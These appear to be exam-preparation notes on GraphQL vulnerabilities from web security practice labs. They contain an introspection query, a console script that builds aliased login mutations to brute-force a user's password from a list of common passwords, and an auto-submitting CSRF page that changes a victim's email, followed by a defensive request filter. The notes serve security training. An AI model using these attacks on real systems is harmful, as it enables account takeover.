bscp notes

graphql api vulns

API identify

To identify a hidden GraphQL API endpoint, send a GET request to an invalid path and note the generic Not Found message; a GET request to /api instead returns Query not present, which points to a GraphQL endpoint.

Confirming the GraphQL endpoint requires a universal query. Modify the GET request to pass the query as a URL parameter: /api?query=query{__typename}.

The response below confirms that the endpoint is GraphQL:

{
  "data": {
    "__typename": "query"
  }
}

Send a new request with a URL-encoded introspection query as a query parameter.

To do this, right-click the request and select GraphQL > Set introspection query:

This introspection query works with most GraphQL servers. However, if you are working with an older GraphQL server, it may fail. If that happens, right-click anywhere within the Request panel of the message editor, then select GraphQL > Set legacy introspection query and try again.

query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      ...FullType
    }
    directives {
      name
      description
      args {
        ...InputValue
      }
      onOperation
      onFragment
      onField
    }
  }
}

# Fragments the query references (standard definitions, added here so the query is self-contained).
fragment FullType on __Type {
  kind name description
  fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason }
  inputFields { ...InputValue }
  interfaces { ...TypeRef }
  enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason }
  possibleTypes { ...TypeRef }
}
fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue }
fragment TypeRef on __Type {
  kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } }
}

Right-click anywhere within the Response panel of the message editor, then select GraphQL > Save GraphQL queries to site map.

Brute force login

Paste the generated aliased mutations into the POST body inside mutation { ... }, so the whole password list is tried in a single request (aliases let one operation call login many times).

// Run in the browser DevTools console. It builds one aliased login mutation per
// candidate password and copies the result; paste it inside mutation { ... }.
// copy() is a DevTools console helper, not standard JavaScript.
const passwords = `123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',');
copy(passwords.map((element, index) => `
bruteforce$index:login(input:{password: "$password", username: "carlos"}) {
        token
        success
    }
`.replaceAll('$index', index).replaceAll('$password', element)).join('\n'));
console.log("The query has been copied to your clipboard.");

CSRF for change email (GraphQL)

Change the Content-Type to application/x-www-form-urlencoded and convert the JSON body to the form-encoded equivalent:

query=mutation%20changeEmail($input:ChangeEmailInput!){changeEmail(input:$input){email}}&operationName=changeEmail&variables={"input":{"email":"bg66@mail.com"}}

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0a6f00fb03a5613c815ad43e003000be.web-security-academy.net/graphql/v1" method="POST">
      <input type="hidden" name="query" value="mutation&#32;changeEmail&#40;&#36;input&#58;ChangeEmailInput&#33;&#41;&#123;changeEmail&#40;input&#58;&#36;input&#41;&#123;email&#125;&#125;" />
      <input type="hidden" name="operationName" value="changeEmail" />
      <input type="hidden" name="variables" value="&#123;&quot;input&quot;&#58;&#123;&quot;email&quot;&#58;&quot;bg1407&#64;mail&#46;com&quot;&#125;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
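As an added defensive example that is not part of these notes: a pre-filter a GraphQL server could run before executing a request, covering the three issues on this page (the form-encoded CSRF PoC above, the aliased login brute force, and open introspection). The request shape, the field name login and the limit of 3 calls per request are assumptions.

```javascript
// Pre-filter for incoming GraphQL requests, run before the query executes.
// req shape (assumed): { method, contentType, body: { query, operationName, variables } }
const MAX_LOGIN_PER_REQUEST = 3; // assumed limit on login calls per request

// Blank out string literals so a password value such as "login(" is not counted
// as a field call, and so keyword checks only see query structure.
function stripStrings(doc) {
  return doc.replace(/"(?:\\.|[^"\\])*"/g, '""');
}

// Count how many times a field is invoked with arguments, aliased or not
// (login(...) and bruteforce0:login(...) both count).
function countFieldCalls(doc, field) {
  const re = new RegExp('\\b' + field + '\\s*\\(', 'g');
  return (stripStrings(doc).match(re) || []).length;
}

function gateGraphqlRequest(req, allowIntrospection = false) {
  // HTML forms can only send urlencoded, multipart or text/plain bodies, so
  // requiring application/json on POST defeats the form-based CSRF PoC.
  if (req.method === 'POST' && !/^application\/json\b/i.test(req.contentType || '')) {
    return { ok: false, reason: 'POST body must be application/json' };
  }
  const query = req.body && req.body.query;
  if (typeof query !== 'string') return { ok: false, reason: 'missing query' };
  const doc = stripStrings(query);
  // A mutation reachable via GET ?query=... is triggerable by a plain link.
  if (req.method === 'GET' && /\bmutation\b/.test(doc)) {
    return { ok: false, reason: 'mutations are not accepted over GET' };
  }
  // query{__typename} still works as a probe; schema introspection does not.
  if (!allowIntrospection && /\b__schema\b|\b__type\b/.test(doc)) {
    return { ok: false, reason: 'introspection is disabled' };
  }
  const logins = countFieldCalls(query, 'login');
  if (logins > MAX_LOGIN_PER_REQUEST) {
    return { ok: false, reason: `${logins} login calls in one request (alias batching)` };
  }
  return { ok: true };
}
```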
